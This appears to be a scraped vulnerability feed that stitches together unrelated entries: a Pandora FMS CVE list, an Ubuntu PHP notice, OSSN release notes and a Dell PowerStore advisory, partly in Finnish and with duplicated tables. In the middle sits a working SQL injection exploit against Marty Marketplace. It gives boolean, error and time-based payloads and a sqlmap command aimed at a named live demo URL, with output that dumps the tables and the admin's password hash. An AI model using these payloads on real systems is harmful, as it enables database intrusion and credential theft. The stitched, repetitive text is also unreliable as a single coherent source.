In Pandora FMS v7.0NG.761 and below, in the agent creation section, the alias parameter is vulnerable to a Stored Cross Site-Scripting. This vulnerability can be exploited by an attacker with administrator privileges logged in the system.

CVE-2022-2032 Stored Cross Site-Scripting in File Manager 14 Jun 2022 762 CVE-2022-2059 Stored Cross Site-Scripting in Agent Manager 14 Jun 2022 762 CVE-2022-1648 Relative Path Traversal to Remote Code Execution in File Manager 13 May 2022 761 CVE-2022-26310 Improper Authorization in User Management to Vertical Privilege Escalation 13 May 2022 761 CVE-2022-26309 Cross-Site Request en Bulk operation (User operation) 13 May 2022 761 CVE-2022-26308 Improper Access Control in Configuration (Credential store) 13 May 2022 761 CVE-2022-0507 Vulnerability: Authenticated SQL Injection in API 10 Feb 2022 760 CVE-2021-46681 Vulnerability XSS in module mass operation name field 15 Sept 2021 757 CVE-2021-46680 Vulnerability XSS in module form name field 15 Sept 2021 757 CVE-2021-46679 Vulnerability XSS in service elements 15 Sept 2021 757 CVE-2021-46678 Vulnerability XSS in service from name field 15 Sept 2021 757 CVE-2021-46677 Vulnerability XSS in Event filter name field 15 Sept 2021 757 CVE-2021-46676 Vulnerability XSS in Transaction Map name field 15 Sept 2021 757 CVE-2021-34075 In Artica Pandora FMS <=754 in the File Manager component, there is sensitive information exposed on the client side which attackers can access. 30 Jun 2021 756 CVE-2021-35501 Vulnerability XSS in in the name field of a visual console 25 Jun 2021 755 CVE-2021-32100 A remote file inclusion vulnerability exists in Artica Pandora FMS 742, exploitable by the lowest privileged user. 29 Jan 2020 743 CVE-2021-32099 A SQL injection vulnerability in the pandora\_console component of Artica Pandora FMS 742 allows an nauthenticated attacker to upgrade his unprivileged session via the /include/chart\_generator.php session\_id parameter, leading to a login bypass. 29 Jan 2020 743 CVE-2021-32098 functions\_netflow.php in Artica Pandora FMS 7.0 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the index.php?operation/netflow/nf\_live\_view ip\_dst, dst\_port, or src\_port parameter, a different vulnerability than CVE-2019-20224. 29 Jan 2020 743 CVE-2020-8947 functions\_netflow.php in Artica Pandora FMS 7.0 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the index.php?operation/netflow/nf\_live\_view ip\_dst, dst\_port, or src\_port parameter, a different vulnerability than CVE-2019-20224. 18 Dec 2019 742 CVE-2020-8511 In Artica Pandora FMS through 7.42, Web Admin users can execute arbitrary code by uploading a .php file via the File Repository component, a different issue than CVE-2020-7935 and CVE-2020-8500. 8 Jun 2021 93 CVE-2020-8500 \*\* DISPUTED \*\* In Artica Pandora FMS 7.42, Web Admin users can execute arbitrary code by uploading a .php file via the Updater or Extension component. NOTE: The vendor reports that this is intended functionality. 8 Jun 2021 93 CVE-2020-8497 In Artica Pandora FMS through 7.42, an unauthenticated attacker can read the chat history. The file is in JSON format and it contains user names, user IDs, private messages, and timestamps. 8 Jun 2021 93 CVE-2020-7935 Artica Pandora FMS through 7.42 is vulnerable to remote PHP code execution because of an Unrestricted Upload Of A File With A Dangerous Type issue in the File Manager. An attacker can create a (or use an existing) directory that is externally accessible to store PHP files. The filename and the exact path is known by the attacker, so it is possible to execute PHP code in the context of the application. The vulnerability is exploitable only with Administrator access. 8 Jun 2021 755 CVE-2020-5844 index.php?sec=godmode/extensions&sec2=extensions/files\_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742\_FIX\_PERL2020. 10 Feb 2021 752 CVE-2020-26518 Pandora FMS before 743 allows unauthenticated attackers to conduct SQL injection attacks via the pandora\_console/include/chart\_generator.php session\_id parameter. 2 Oct 2020 743 CVE-2020-13855 Pandora FMS 744 allows arbitrary file upload (leading to remote command execution) via the File Repository Manager feature. 4 Jun 2020 745 CVE-2020-13854 Pandora FMS 744 allows privilege escalation. 4 Jun 2020 745 CVE-2020-13853 Pandora FMS 744 has persistent XSS in the Messages feature. 4 Jun 2020 745 CVE-2020-13852 Pandora FMS 744 allows arbitrary file upload (leading to remote command execution) via the File Manager feature. 4 Jun 2020 745 CVE-2020-13851 Pandora FMS 744 allows remote command execution via the events feature. 4 Jun 2020 745 CVE-2020-13850 Artica Pandora FMS 744 has inadequate access controls on a web folder. 4 Jun 2020 747 CVE-2020-11749 Pandora FMS 7.0 NG 746 suffers from Multiple XSS vulnerabilities in different browser views. A network administrator scanning a SNMP device can trigger a Cross Site Scripting (XSS), which can run arbitrary code to allow Remote Code Execution as root or apache2. 14 Apr 2020 747 CVE-2020-8947 Allows remote attackers to execute arbitrary OS commands via shell metacharacters in the netflow report. It needs valid credentials to success. 12 Feb 2020 743 CVE-2020-8511 Pandora FMS through 7.42, admin users can execute arbitrary code by uploading a .php file via the File Repository component. 31 Jan 2020 N/A CVE-2020-8497 Pandora FMS through 7.42, an unauthenticated attacker can read the chat history. The file is in JSON format and it contains user names, user IDs, private messages, and timestamps. 30 Jan 2020 746 CVE-2020-7935 Artica Pandora FMS through 742 is vulnerable to remote PHP code execution because of an Unrestricted Upload Of A File With A Dangerous Type issue in the File Manager by the admin user. The vulnerability is exploitable only with Administrator access. 23 Jan 2020 N/A CVE-2020-5844 Files\_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. 6 Jan 2020 743 CVE-2019-20224 Netflow stats in Pandora FMS NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip\_src parameter. 2 Jan 2020 742 CVE-2019-20050 Pandora FMS 742 suffers from a remote code execution vulnerability. To exploit the vulnerability, an authenticated user should create a new folder with a "tricky" name in the filemanager. The exploit works when the php-fileinfo extension is disabled on the host system. The attacker must include shell metacharacters in the content type. 27 Dec 2019 742 CCVE-2019-13035 Pandora FMS 7.0 NG before 735 suffers from local privilege escalation due to improper permissions on C:\\PandoraFMS and its sub-folders, allowing standard users to create new files. Moreover, the Apache service httpd.exe will try to execute cmd.exe from C:\\PandoraFMS (the current directory) as NT AUTHORITY\\SYSTEM upon web requests to the portal. This will effectively allow non-privileged users to escalate privileges to NT AUTHORITY\\SYSTEM. 29 Jun 2019 735 CVE-2018-11223 XSS in Artica Pandora FMS before 723 allows an attacker to execute arbitrary code via a crafted "refr" parameter. 16 May 2018 723 CVE-2018-11222 Local File Inclusion (LFI) in Pandora FMS through version 723 allows an attacker to call any php file via the /pandora\_console/ajax.php ajax endpoint. 16 May 2018 723 CVE-2018-11221 Unauthenticated untrusted file upload in Pandora FMS through version 723 allows an attacker to upload an arbitrary plugin via include/ajax/update\_manager.ajax in the update system. 16 May 2018 723 CVE-2017-15937 Pandora FMS version 7.0 leaks a full installation pathname via GET data when intercepting the main page's graph requisition. This also implies that general OS information is leaked (e.g., a /var/www pathname typically means Linux or UNIX). 27 Oct 2017 714 CVE-2017-15936 Pandora FMS NG an Attacker with write Permission can create an agent with an XSS Payload; when a user enters the agent definitions page, the script will get executed. 27 Oct 2017 714 CVE-2017-15935 Pandora FMS 7.0 vulnerable to remote PHP code execution through the manager files function. This is only exploitable by administrators who upload a PHP file. 27 Oct 2017 714 CVE-2017-15934 Pandora FMS 7.0 is vulnerable to stored Cross-Site Scripting in the map name parameter. 27 Oct 2017 714 CVE-2010-4283 PHP remote file inclusion vulnerability in extras/pandora\_diag.php in Pandora FMS before 3.1.1 allows remote attackers to execute arbitrary PHP code via a URL in the argv\[1\] parameter. 17 Nov 2014 3.1.1 CVE-2010-4282 Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora\_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php. 17 Nov 2014 3.1.1 CVE-2010-4281 Incomplete blacklist vulnerability in the safe\_url\_extraclean function in ajax.php in Pandora FMS before 3.1.1 allows remote attackers to execute arbitrary PHP code by using a page parameter containing a UNC share pathname, which bypasses the check for the : (colon) character. 17 Nov 2014 3.1.1 CVE-2010-4280 Multiple SQL injection vulnerabilities in Pandora FMS before 3.1.1 allow remote authenticated users to execute arbitrary SQL commands via (1) the id\_group parameter in an operation/agentes/ver\_agente action to ajax.php or (2) the group\_id parameter in an operation/agentes/estado\_agente action to index.php, related to operation/agentes/estado\_agente.php. 17 Nov 2014 3.1.1 CVE-2010-4279 The default configuration of Pandora FMS 3.1 and earlier specifies an empty string for the loginhash\_pwd field, which allows remote attackers to bypass authentication by sending a request to index.php with "admin" in the loginhash\_user parameter, in conjunction with the md5 hash of "admin" in the loginhash\_data parameter. 17 Nov 2014 3.1.1 CVE-2010-4278 operation/agentes/networkmap.php in Pandora FMS before 3.1.1 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the layout parameter in an operation/agentes/networkmap action to index.php. 17 Nov 2014 3.1.1 CVE-2014-8629 Cross-site scripting (XSS) vulnerability in the Page visualization agents in Pandora FMS 5.1 SP1 and earlier allows remote attackers to inject arbitrary web script or HTML via the refr parameter to index.php. 11 Nov 2014 5.1 SP2

CVE-2022-2059: Pandora FMS Common Vulnerabilities and Exposures

Ubuntu Security Notice 5530-1 - It was discovered that PHP incorrectly handled certain memory operations when obtaining file information. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5530-1July 25, 2022php8.1 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:PHP could be made to crash or run programs if it processed speciallycrafted data.Software Description:- php8.1: HTML-embedded scripting language interpreterDetails:It was discovered that PHP incorrectly handled certain memory operationswhen obtaining file information. A remote attacker could use this issue tocause PHP to crash, resulting in a denial of service, or possibly executearbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  libapache2-mod-php8.1           8.1.2-1ubuntu2.2  php8.1-cgi                      8.1.2-1ubuntu2.2  php8.1-cli                      8.1.2-1ubuntu2.2  php8.1-fpm                      8.1.2-1ubuntu2.2  php8.1-mysql                    8.1.2-1ubuntu2.2  php8.1-pgsql                    8.1.2-1ubuntu2.2In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5530-1  CVE-2022-31627Package Information:  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.2

Ubuntu Security Notice USN-5530-1

Marty Marketplace Multi Vendor Ecommerce Script version 1.2 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                       [ Exploits ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                        │ │                                         :│  Website  : sangvish.com                   │ │                                         ││  Vendor   : SangVish Technologies          │ │                                         ││  Software : Marty Marketplace Multi Vendor │ │  Open Source Marketplace PHP script for ││             Ecommerce Script v1.2          │ │  eCommerce marketplace platforms        ││  Vuln Type: Remote SQL Injection           │ │  in the market                          ││  Method   : GET                            │ │                                         ││  Impact   : Database Access                │ │                                         ││                                            │ │                                         ││────────────────────────────────────────────┘ └─────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Typically used for remotely exploitable vulnerabilities that can lead to              ││  system compromise.                                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:       Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk     loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear            CryptoJob (Twitter) twitter.com/CryptozJob          Special Greetz to The Lebanese National Basketball Team for the results of     the FIBA Asia Cup┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                     © CraCkEr 2022                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'attributes[]' is vulnerable---Parameter: attributes[] (GET)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (original value)    Payload: attributes[]=(SELECT (CASE WHEN (6997=6997) THEN 6 ELSE (SELECT 7905 UNION SELECT 6396) END))    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: attributes[]=6 AND GTID_SUBSET(CONCAT(0x717a7a6271,(SELECT (ELT(8162=8162,1))),0x716b6a7071),8162)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: attributes[]=6 AND (SELECT 8488 FROM (SELECT(SLEEP(5)))dSkn)---Demo: https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6[+] Starting the Attacksqlmap.py -u "https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6" --current-db --batch[+] fetching current database[INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL >= 5.6[INFO] retrieved: 'garudan_buy2marty'current database: 'garudan_buy2marty'[+] fetching tables for database: 'garudan_buy2marty'Database: garudan_buy2marty[105 tables]+----------------------------------------+| activations                            || ads                                    || ads_translations                       || audit_histories                        || categories                             || categories_translations                || contact_replies                        || contacts                               || dashboard_widget_settings              || dashboard_widgets                      || ec_brands                              || ec_brands_translations                 || ec_cart                                || ec_currencies                          || ec_customer_addresses                  || ec_customer_password_resets            || ec_customers                           || ec_discount_customers                  || ec_discount_product_collections        || ec_discount_products                   || ec_discounts                           || ec_flash_sale_products                 || ec_flash_sales                         || ec_flash_sales_translations            || ec_grouped_products                    || ec_order_addresses                     || ec_order_histories                     || ec_order_product                       || ec_orders                              || ec_product_attribute_sets              || ec_product_attribute_sets_translations || ec_product_attributes                  || ec_product_attributes_translations     || ec_product_categories                  || ec_product_categories_translations     || ec_product_category_product            || ec_product_collection_products         || ec_product_collections                 || ec_product_collections_translations    || ec_product_cross_sale_relations        || ec_product_label_products              || ec_product_labels                      || ec_product_labels_translations         || ec_product_related_relations           || ec_product_tag_product                 || ec_product_tags                        || ec_product_tags_translations           || ec_product_up_sale_relations           || ec_product_variation_items             || ec_product_variations                  || ec_product_with_attribute              || ec_product_with_attribute_set          || ec_products                            || ec_products_translations               || ec_reviews                             || ec_shipment_histories                  || ec_shipments                           || ec_shipping                            || ec_shipping_rule_items                 || ec_shipping_rules                      || ec_store_locators                      || ec_taxes                               || ec_wish_lists                          || failed_jobs                            || faq_categories                         || faq_categories_translations            || faqs                                   || faqs_translations                      || jobs                                   || language_meta                          || languages                              || media_files                            || media_folders                          || media_settings                         || menu_locations                         || menu_nodes                             || menus                                  || meta_boxes                             || migrations                             || mp_customer_revenues                   || mp_customer_withdrawals                || mp_stores                              || mp_vendor_info                         || newsletters                            || pages                                  || pages_translations                     || password_resets                        || payments                               || post_categories                        || post_tags                              || posts                                  || posts_translations                     || revisions                              || role_users                             || roles                                  || settings                               || simple_slider_items                    || simple_sliders                         || slugs                                  || tags                                   || tags_translations                      || translations                           || user_meta                              || users                                  || widgets                                |+----------------------------------------+[+] fetching columns for table 'users' in database 'garudan_buy2marty'Database: garudan_buy2martyTable: users[15 columns]+-------------------+---------------------+| Column            | Type                |+-------------------+---------------------+| avatar_id         | int(10) unsigned    || created_at        | timestamp           || email             | varchar(191)        || email_verified_at | timestamp           || first_name        | varchar(191)        || id                | bigint(20) unsigned || last_login        | timestamp           || last_name         | varchar(191)        || manage_supers     | tinyint(1)          || password          | varchar(191)        || permissions       | text                || remember_token    | varchar(100)        || super_user        | tinyint(1)          || updated_at        | timestamp           || username          | varchar(60)         |+-------------------+---------------------+[+] fetching entries of column(s) 'id,password,permissions,super_user,username' for table 'users' in database 'garudan_buy2marty'Database: garudan_buy2martyTable: users[1 entry]+----+----------+--------------------------------------------------------------+------------+-------------+| id | username | password                                                     | super_user | permissions |+----+----------+--------------------------------------------------------------+------------+-------------+| 1  | admin    | $2y$10$XHYYo3gcYa5sUh62hgASseoSJfQae/w8KOWAW/G6qlHRri6XPRW/2 | 1          | NULL        |+----+----------+--------------------------------------------------------------+------------+-------------+                 Possible algorithms: bcrypt $2*$, Blowfish (Unix)[-] Done

Marty Marketplace Multi Vendor Ecommerce Script 1.2 SQL Injection

OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the News Feed module.

OSSN - OPEN SOURCE SOCIAL NETWORK v6.3 LTS

*   \[E\] Allow all callables for extend view #2024
*   \[E\] avoiding unnecessary handling of extra space at comment start #2029
*   \[B\] skip friend access check if page visitor is not logged in #2037
*   \[B\] User can not comment on friend only, own album photo #2039
*   \[B\] OssnSounds missing the button for sound on/off #2032
*   \[E\] Make sure addUser also run isEmail validation #2022
*   \[E\] Multiple select (html) handler #2040
*   \[B\] jqueryui-datepicker fails on Google translated pages #2036
*   \[B\] ossn\_delete\_relationship recursive not working #2035
*   \[E\] add a new function ossn\_get\_relation\_by\_id() #2034
*   \[B\] UI add friend success text goes wrong position #2027
*   \[E\] update version and pre-requisite OssnEmbed #2045
*   \[B\] fixed unallowed
    
    inside paragraph again #2044
    
*   \[E\] load css for video in #2043
*   \[E\] make video visible in #2042
*   \[E\] Add provided by giphy footer or banner #2049
*   \[E\] Correction of term 'miinutos' to 'minutos' #2048
*   \[E\] CLI + cron library and documentation on community #2050
*   \[B\] fixed calling unavailable/mistyped function #2051
*   \[E\] OssnMail 'email', 'send:policy' 3rd parameter #2052
*   \[E\] \[E\] optimized getMyGroups() #2071
*   \[E\] optimized OssnGroup::isMember() #2070
*   \[E\] optimized OssnGroup::getMembersRequests() #2069
*   \[E\] optimized group join-requests counter #2067
*   \[E\] PHP8 prevent bool->guid warnings #2058
*   \[B\] fixed missing error handler for not existing subpages #2055
*   \[E\] Add confirmation before deleting photos #2073
*   \[E\] Enhance group menu entries in sidebar #2072
*   \[B\] PHP8 If deleted comments tried to be deleted again #2057
*   \[B\] OssnNotification if poster and owner is same participants hook never run #2053
*   \[B\] Fix the like:object view menu type introduced in #1868 #2081
*   \[E\] Replace translation PT #2079 #2075
*   \[E\] Improve mod\_rewrite CURL functionality #2078
*   \[B\] fixed use of undefined variable $object #2084
*   \[E\] Some small locale fixes. #2087
*   \[B\] PHP Warning: preg\_match(): Compilation failed (#2018). #2086
*   \[B\] fix creating incomplete wall entities if addPhoto() fails #2088
*   \[B\] prevent warning if $fields is false #2137 #2136 #2135
*   \[E\] Update PHP version to minimum 8 #2061
*   \[B\] Comment Static photo should have only filename no fullpath #2090
*   \[B\] No notification to participants if someone comments on profile photo , cover, album photo #2054
*   \[B\] jqueryui-datepicker fails on Google translated pages #2036
*   \[E\] Removal of old upgrade scripts #2085
*   \[E\] Enhance OssnFile and Include CDN option #2089
*   \[E\] fixed different 'readonly' colors #2134
*   \[B\] missing check if member has a cover image #2093
*   \[E\] some installation warnings #2018
*   \[E\] don't list unvalidated members #2144
*   \[B\] Multiple clicks on same action add member multiple times in group #2147
*   \[B\] col-xs not anymore with BS5 #2017
*   \[E\] Remove php5 apache config and update post and upload sizes #2033
*   \[E\] Stop rewriting .htaccess every time page loads during installation #2091
*   \[B\] Deleting a group should remove group:joinrequest records #2066
*   \[E\] Enable linkifying of Entity comments #2080
*   \[B\] wrong class extending in all input plugins #2146
*   \[E\] Ossn::File MaxSize() add UploadMaxSize #2148
*   \[B\] getting orphan notification records of type comments:post:group:wall #2060
*   \[E\] isModerator (for groups) in comments section also. #2025
*   \[E\] Added OssnJWT class based on firebase/JWT
*   \[E\] Updated cacert.pem
*   \[E\] Updated PHP MAILER to 6.6.0
*   \[B\] Pagination not responsive #2150
*   \[E\] Show components in admin panel in ASC order of their installation #2155
*   \[E\] Component delete confirmation if wanted to keep settings. #2152
*   \[T\] OssnUser::getFriends() #2149
*   \[B\] Pagination not responsive #2150
*   \[B\] btn-sm have no effect #2153
*   \[B\] missing checkbox-block span style #2145
*   \[B\] Non logged in visitor can view private posts #2158
*   \[B\] OssnChat default value showing 0 in class #2163
*   \[E\] Request for new user image classes defining the shape only #2143
*   \[B\] Post background not breaking if str > 125 chars #2164
*   \[B\] deleting profile photo gives error on iconURL() #2166
*   \[B\] deleting profile cover gives error on coverURL() #2166

Special Thanks to Michael Zülsdorff (aka Zetman) (https://www.opensource-socialnetwork.org/u/zetman) for testing and bug reporting, fixing.

CVE-2022-34963: Release OSSN 6.3 LTS · opensource-socialnetwork/opensource-socialnetwork

A regular expression used in Apache MXNet (incubating) is vulnerable to a potential denial-of-service by excessive resource consumption. The bug could be exploited when loading a model in Apache MXNet that has a specially crafted operator name that would cause the regular expression evaluation to use excessive resources to attempt a match. This issue affects Apache MXNet versions prior to 1.9.1.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2022-24294

Cross-Site Request Forgery (CSRF) vulnerability in JoomUnited WP Meta SEO plugin <= 4.4.8 at WordPress allows an attacker to update the social settings.

CVE-2022-30337: WP Meta SEO

Dell PowerStore, versions prior to 3.0.0.0, contains an OS Command Injection vulnerability in PowerStore T environment. A locally authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS command on the PowerStore underlying OS. Exploiting may lead to a system take over by an attacker.

**Vaikutus**

Critical

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-31234

Dell PowerStore contains an Improper Restriction of Excessive Authentication Attempts Vulnerability in PowerStore Manager GUI. A remote unauthenticated attacker may potentially exploit this vulnerability, leading to password brute-forcing. Account takeover is possible if weak passwords are used by users.

8.1

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-22555

Dell PowerStore contains an OS command injection vulnerability. A locally authenticated attacker may potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the PowerStore underlying OS, with the privileges of the vulnerable application. Exploitation may lead to an elevation of privilege.

6.0

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

CVE-2022-32498

Dell PowerStore CLI for Windows has the potential for a DLL highjacking exploit. Exploitation may lead to the execution of arbitrary code.  

5.5

CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:L 

CVE-2022-33923

Dell PowerStore contains an OS Command Injection vulnerability in the PowerStore T environment. A locally authenticated attacker may potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the PowerStore underlying OS. Exploiting may lead to a system takeover by an attacker.

6.4

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

 

**Third-party Component**

**CVEs**

**More Information**

Ansible

CVE-2019-10156

See NVD (http://nvd.nist.gov/) for individual scores of each CVE.

Apache Shiro

CVE-2021-41303

Highcharts JS

CVE-2021-29489

Jinja2

CVE-2019-10906

CVE-2016-10745

CVE-2020-28493

libsndfile

CVE-2021-3246

libX11  
libX11-data

CVE-2021-31535

libexpat

CVE-2022-22822

CVE-2022-22823

CVE-2022-22824

CVE-2022-23852

CVE-2022-23990

CVE-2022-25235

CVE-2022-25236

CVE-2022-25315

Log4j

CVE-2020-9488

CVE-2021-45105

CVE-2021-44832

lxml

CVE-2021-43818

CVE-2021-28957

CVE-2020-27783

netty

CVE-2021-43797

NSS NSPR  
libfreebl3  
libfreebl3-hmac  
libsoftokn3  
libsoftokn3-hmac  
mozilla-nss  
mozilla-nss-certs  
mozilla-nss-tools       
mozilla-nspr

CVE-2020-12403

CVE-2021-43527

numpy

CVE-2021-41496

openssl

CVE-2021-3711

pip

CVE-2019-20916

postgres

CVE-2021-32027

CVE-2021-32028

CVE-2021-3393

CVE-2021-3677

CVE-2021-23222

CVE-2021-23214

Python-3

CVE-2021-25315

CVE-2020-25592

CVE-2020-11651

CVE-2020-11652

CVE-2018-15751

pyyaml

CVE-2020-14343

CVE-2017-18342

ruby

CVE-2020-25613

xterm  
xterm-bin

CVE-2021-27135

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-31234

Dell PowerStore contains an Improper Restriction of Excessive Authentication Attempts Vulnerability in PowerStore Manager GUI. A remote unauthenticated attacker may potentially exploit this vulnerability, leading to password brute-forcing. Account takeover is possible if weak passwords are used by users.

8.1

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-22555

Dell PowerStore contains an OS command injection vulnerability. A locally authenticated attacker may potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the PowerStore underlying OS, with the privileges of the vulnerable application. Exploitation may lead to an elevation of privilege.

6.0

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

CVE-2022-32498

Dell PowerStore CLI for Windows has the potential for a DLL highjacking exploit. Exploitation may lead to the execution of arbitrary code.  

5.5

CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:L 

CVE-2022-33923

Dell PowerStore contains an OS Command Injection vulnerability in the PowerStore T environment. A locally authenticated attacker may potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the PowerStore underlying OS. Exploiting may lead to a system takeover by an attacker.

6.4

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

 

**Third-party Component**

**CVEs**

**More Information**

Ansible

CVE-2019-10156

See NVD (http://nvd.nist.gov/) for individual scores of each CVE.

Apache Shiro

CVE-2021-41303

Highcharts JS

CVE-2021-29489

Jinja2

CVE-2019-10906

CVE-2016-10745

CVE-2020-28493

libsndfile

CVE-2021-3246

libX11  
libX11-data

CVE-2021-31535

libexpat

CVE-2022-22822

CVE-2022-22823

CVE-2022-22824

CVE-2022-23852

CVE-2022-23990

CVE-2022-25235

CVE-2022-25236

CVE-2022-25315

Log4j

CVE-2020-9488

CVE-2021-45105

CVE-2021-44832

lxml

CVE-2021-43818

CVE-2021-28957

CVE-2020-27783

netty

CVE-2021-43797

NSS NSPR  
libfreebl3  
libfreebl3-hmac  
libsoftokn3  
libsoftokn3-hmac  
mozilla-nss  
mozilla-nss-certs  
mozilla-nss-tools       
mozilla-nspr

CVE-2020-12403

CVE-2021-43527

numpy

CVE-2021-41496

openssl

CVE-2021-3711

pip

CVE-2019-20916

postgres

CVE-2021-32027

CVE-2021-32028

CVE-2021-3393

CVE-2021-3677

CVE-2021-23222

CVE-2021-23214

Python-3

CVE-2021-25315

CVE-2020-25592

CVE-2020-11651

CVE-2020-11652

CVE-2018-15751

pyyaml

CVE-2020-14343

CVE-2017-18342

ruby

CVE-2020-25613

xterm  
xterm-bin

CVE-2021-27135

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**CVEs Addressed**

**Products**

**Affected Versions**

**Updated Versions**

**Link to Update**

All CVEs above excluding CVE-2022-32498

PowerStore T OS

PowerStore T OS versions before PowerStore T OS Upgrade 3.0.0.0-1732745

PowerStore T OS Upgrade 3.0.0.0-1732745

https://www.dell.com/support/home/?app=drivers

CVE-2022-32498

PowerStore Command Line Interface (CLI) tool for Windows

PowerStore Command Line Interface (CLI) tool for Linux x64 versions before 3.0.0.0-1732745

PowerStore Command Line Interface (CLI) tool for Linux x86 versions before 3.0.0.0-1732745

PowerStore Command Line Interface (CLI) tool for Linux x64 3.0.0.0-1732745

PowerStore Command Line Interface (CLI) tool for Linux x86 3.0.0.0-1732745

https://www.dell.com/support/home/?app=drivers

**CVEs Addressed**

**Products**

**Affected Versions**

**Updated Versions**

**Link to Update**

All CVEs above excluding CVE-2022-32498

PowerStore T OS

PowerStore T OS versions before PowerStore T OS Upgrade 3.0.0.0-1732745

PowerStore T OS Upgrade 3.0.0.0-1732745

https://www.dell.com/support/home/?app=drivers

CVE-2022-32498

PowerStore Command Line Interface (CLI) tool for Windows

PowerStore Command Line Interface (CLI) tool for Linux x64 versions before 3.0.0.0-1732745

PowerStore Command Line Interface (CLI) tool for Linux x86 versions before 3.0.0.0-1732745

PowerStore Command Line Interface (CLI) tool for Linux x64 3.0.0.0-1732745

PowerStore Command Line Interface (CLI) tool for Linux x86 3.0.0.0-1732745

https://www.dell.com/support/home/?app=drivers

**Keinoja ongelman kiertämiseen tai lieventämiseen**

**CVE-2022-31234:**  
Configure a long, complex password for the System management account, and change it on a regular basis. See PowerStore Security Configuration Guide (https://dl.dell.com/content/manual52196227-dell-emc-powerstore-security-configuration-guide.pdf) for password requirements. The minimum number of characters is 8 however you should configure a longer than 8 password in order to make it very difficult to brute force.    

**CVE-2022-22555:**  
An attacker requires local access through external SSH; therefore, it is recommended to always leave the external SSH service interface disabled unless it must be used to perform service operations on the appliance. After performing the necessary service operations, disable the SSH interface to ensure that the appliance remains secure. See PowerStore Security Configuration Guide (https://dl.dell.com/content/manual52196227-dell-emc-powerstore-security-configuration-guide.pdf) for detailed information about external SSH access.

**Versiohistoria**

**Revision**

**Date**

**More Information**

1.0

2022-07-07

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

PowerStore, PowerStore 1000T, PowerStore 1200T, PowerStore 3000T, PowerStore 5000T, PowerStore 500T, PowerStore 7000T, PowerStore 9000T, Product Security Information

07 heinäk. 2022

